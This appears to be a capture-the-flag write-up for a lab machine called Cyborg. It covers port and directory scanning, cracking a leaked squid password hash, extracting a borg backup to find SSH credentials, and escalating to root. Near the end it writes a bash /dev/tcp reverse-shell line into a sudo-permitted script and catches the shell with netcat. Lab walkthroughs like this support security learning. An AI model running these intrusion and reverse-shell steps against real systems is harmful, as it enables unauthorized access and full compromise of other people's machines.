Cyborg

Room Details

Service Discovery
Web Content Discovery
Hash Cracking
Data Decompression
Privilege Escalation

Target

IP: 10.10.230.194

Service Discovery

Scan for open ports with nmap

$ nmap -sC -sV -A -sS -Pn -oN nmap.txt 10.10.230.194
Nmap scan report for 10.10.230.194
Host is up (0.44s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
|   256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_  256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=7/10%OT=22%CT=1%CU=35008%PV=Y%DS=4%DC=T%G=Y%TM=62CAA3E
OS:0%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M505ST11NW6%O2=M505ST11NW6%O3=M505NNT11NW6%O4=M505ST11NW6%O5=M505ST1
OS:1NW6%O6=M505ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN
OS:(R=Y%DF=Y%T=40%W=F507%O=M505NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 993/tcp)
HOP RTT       ADDRESS
1   279.37 ms 10.2.0.1
2   ... 3
4   514.99 ms 10.10.230.194

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Services Discovered
Service
Port
Version
HTTP
80
Apache 2.4.18
SSH
22
OpenSSH 7.2p2
OS: Ubuntu from service description
Answer Task 2 first three questions

Web Content Discovery

Scan for directories using gobuster

gobuster dir -u http://10.10.230.194 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 40 --no-error -o web-dirs.txt

Directories Discovered

Dirs

Description

Files Found

/admin

homepage

from archive dropdown found archive.tar file

/etc

squid proxy

squid password and configuration files

Analyzing Directories

From /etc found /etc/squid/passwd which contains password hash and squid config file /etc/squid/squid.conf

# reading files

# /etc/squid/passwd
music_archive:{REDACTED}

# /etc/squid/squid.conf
auth_param basic program /usr/lib64/squid/basic_ncsa_auth /etc/squid/passwd
auth_param basic children 5
auth_param basic realm Squid Basic Authentication
auth_param basic credentialsttl 2 hours
acl auth_users proxy_auth REQUIRED
http_access allow auth_users

Cracking Password Hash

Store hash into a file passwd_hash.txt

Crack the hash using hashcat

john passwd_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

squidward (music_archive)

We've successfully found the password from the hash

Analyzing Tar file

extract tar file
```
tar -xvf archive.tar
```
Found readme file which leads us to the borg documentation page
We need to install borg to extract the files from the compressed format
Install borg
```
sudo apt install borgbackup -y
```
For debian based For other distribution refer borg installation documentation

decompress extracted files from archive.tar using borg

borg extract ./home/field/dev/final_archive::music_archive

After files are decompressed successfully, it data turns out to the home directory backup for alex's account

Found Password from /home/alex/Documents/note.txt

Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!

alex:{REDACTED}

ssh alex@10.10.230.194
alex@10.10.230.194 password: # enter password from note.txt
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.15.0-128-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

27 packages can be updated.
0 updates are security updates.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

alex@ubuntu:~$

We got access to Alex Account

Get User Flag

alex@ubuntu:~$ cat user.txt
flag{REDACTED}

Privilege Escalation

Check for sudo exectuables

alex@ubuntu:~$ sudo -l
Matching Defaults entries for alex on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh

We can run file /etc/mp3backups/backup.sh as with root privileges

Check whether file is writable
```
alex@ubuntu:~$ ls -la /etc/mp3backups/backup.sh
-r-xr-xr-- 1 alex alex 1083 Dec 30  2020 /etc/mp3backups/backup.sh
```
We cannot write file, but user is alex, so we can change file permissions using chmod
Allow all permissions to the files
```
alex@ubuntu:~$ chmod 777 /etc/mp3backups/backup.sh
```
Note: Allowing all users rwx permissions isn't a good practice, but for ease, I've provided them rights
Overwrite file with Bash Reverse Shell on alex's machine
```
alex@ubuntu:~$ echo "bash -c 'exec bash -i &>/dev/tcp/ATTACKER_THM_IP/4444 <&1'" > /etc/mp3backups/backup.sh
```
Reverse shell will connect to attacker's machine on port 4444
Start netcat on attacker's machine
```
nc -nlvp 4444
```

Execute bash script from target machine

alex@ubuntu:~$ sudo /etc/mp3backups/backup.sh

Now, we've successfully rooted the machine

$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [ATTACKER_THM_IP] from (UNKNOWN) [10.10.230.194] 36492
root@ubuntu:~#

Get Root Flag

root@ubuntu:~# cat root.txt
flag{REDACTED}

PreviousCrack The Hash NextOverPass

Last updated 3 years ago

Was this helpful?